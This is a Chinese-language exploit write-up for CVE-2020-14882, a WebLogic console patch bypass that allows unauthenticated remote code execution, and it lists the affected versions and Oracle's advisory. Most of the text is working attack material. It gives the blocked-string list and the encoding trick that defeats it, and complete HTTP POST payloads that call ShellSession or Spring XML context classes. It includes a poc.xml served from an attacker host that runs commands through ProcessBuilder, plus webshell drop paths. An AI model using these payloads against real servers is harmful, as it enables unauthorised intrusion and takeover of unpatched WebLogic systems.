CVE-2020–14882 Weblogic补丁绕过未授权访问进行rce

CVE-2020–14882 Weblogic补丁绕过未授权访问进行rce

private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};
>>> "%252E%252E%252F".lower()
'%252e%252e%252f'

%252E%252E%252F 至 %252e%252e%252f

/console/images/%252e%252e%252fconsole.portal

来自https://twitter.com/chybeta/status/1322131143034957826/photo/2

cmd命令

 cmd.exe /c chcp 65001&&whoami&&ipconfig

Shell会话

coherence-rest.jar#com.tangosol.coherence.mvel2.sh.ShellSession

payload

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime('calc.exe');");

Getshell

ROOT_PATH= C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\

Shell_path= ../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp

演示视频[代码可复制]

FileSystemXmlApplicationContext

com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.242.1:8989/poc.xml")

poc.xml

python -m SimpleHTTPServer

python -m pyftpdlib

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
      <constructor-arg>
        <list>
          <value>cmd</value>
          <value>/c</value>
          <value><![CDATA[calc]]></value>
        </list>
      </constructor-arg>
    </bean>
  </beans>

ClassPathXmlApplicationContext

com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.28.128:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://172.16.242.1:8989/poc.xml")

CVE-2020–14882路径

没有路径

C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar

com.bea.console.utils.MBeanUtilsInitSingleFileServlet

package com.bea.console.utils;

import com.bea.netuix.servlets.manager.SingleFileServlet;
import java.io.IOException;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;

public class MBeanUtilsInitSingleFileServlet extends SingleFileServlet {
  private static final Log LOG = LogFactory.getLog(MBeanUtilsInitSingleFileServlet.class);
  
  private static final String WL_DISPATCH_POLICY = "wl-dispatch-policy";
  
  private static boolean hasInited = false;
  
  private static final long serialVersionUID = 1L;
  
  public static void initMBean() {
    MBeanUtilsInitializer.initMBeanAsynchronously();
  }
  
  public void init(ServletConfig config) throws ServletException {
    ConsoleWorkManagerUtils.init(config.getInitParameter("wl-dispatch-policy"));
    super.init(config);
  }
  
  public void service(ServletRequest req, ServletResponse resp) throws ServletException, IOException {
    if (!hasInited) {
      initMBean();
      hasInited = true;
    } 
    if (req instanceof HttpServletRequest) {
      HttpServletRequest httpServletRequest = (HttpServletRequest)req;
      String url = httpServletRequest.getRequestURI();
      if (url.indexOf(";") > 0) {
        if (resp instanceof HttpServletResponse) {
          HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
          httpServletResponse.sendError(404);
        } 
        return;
      } 
    } 
    try {
      super.service(req, resp);
    } catch (IllegalStateException e) {
      if (LOG.isDebugEnabled())
        LOG.debug(e); 
    } 
  }
}
private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"}; 

列表

%252E%252E
%2E%2E
..
%3E
%3C
;
<
>

CVE-2020-14882补丁绕过通知

[漏洞警告]WebLogic控制台远程执行漏洞(CVE-2020-14882)补丁绕过0day

受影响版本

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

参考链接

medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882

https://www.oracle.com/security-alerts/cpuoct2020.html